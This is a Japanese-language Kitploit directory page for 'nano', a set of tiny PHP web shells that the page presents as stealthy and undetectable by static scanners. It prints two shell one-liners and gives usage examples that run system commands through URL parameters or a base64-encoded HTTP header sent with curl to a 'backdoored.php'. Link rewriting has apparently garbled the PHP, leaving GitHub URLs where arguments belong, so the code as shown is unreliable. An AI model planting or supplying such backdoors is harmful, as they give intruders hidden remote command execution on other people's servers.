Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
nano — Nanoは、ステルス性を重視してコードゴルフされたPHPウェブシェルのファミリーです。 | Kitploit
ツール/GitHubGitHub/s0md3v/nano
ペイロード生成シェルコードウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールリモートアクセスツール
GitHubs0md3v/nano

nano

Nanoは、ステルス性を重視してコードゴルフされたPHPウェブシェルのファミリーです。

リポジトリを見る
44991156年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

nano

Nanoは、コードゴルフによって極めてステルス性が高く、効率的なPHPウェブシェルのファミリーです。
もしかしたら注目しておいてください。今後もここにウェブシェルを追加していく予定です。

Nano

<?=$_GET[p]==_&&$_GET[f](https://github.com/s0md3v/nano/blob/master/%24GET_%5Bc%5D);

特徴

  • サイズは35バイト
  • 静的コードスキャナに検出されない
  • 認証をサポート

使い方

http://example.com/nano.php?f=function&c=command&p=password

f は関数用
c はコマンド用
p はパスワード用

例えば、以下のコードは ls コマンドを実行します:

http://example.com/nano.php?f=system&c=ls&p=password

Ninja

<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0](https://github.com/s0md3v/nano/blob/master/%24x%5B1%5D);

特徴

  • サイズは93バイト
  • 完全に検出不可能

使い方

これは少し複雑です。
system(ls) を実行したい場合、system~ls と書いてからbase64エンコードします。つまり c3lzdGVtKGxzKQ== です。
その先頭に任意の1文字を追加します。例えば 'x' を追加すると xc3lzdGVtKGxzKQ== になります。
次にターミナルを開いて、以下のコマンドを入力します。
curl -H 'x: xc3lzdGVtKGxzKQ==' http://example.com/backdoored.php
手間がかかりすぎる?代わりにハンドラを使用できます。

handler

その他

これは私の最初のPHP作品なので、私がやったことをより良い方法で実現できる方法があれば、教えてください。またはプルリクエストを開いてください。
nanoプロジェクトはMITライセンスの下でライセンスされており、基本的には再配布や変更を行う場合、私へのクレジット表示が必要です。

ツールをダウンロード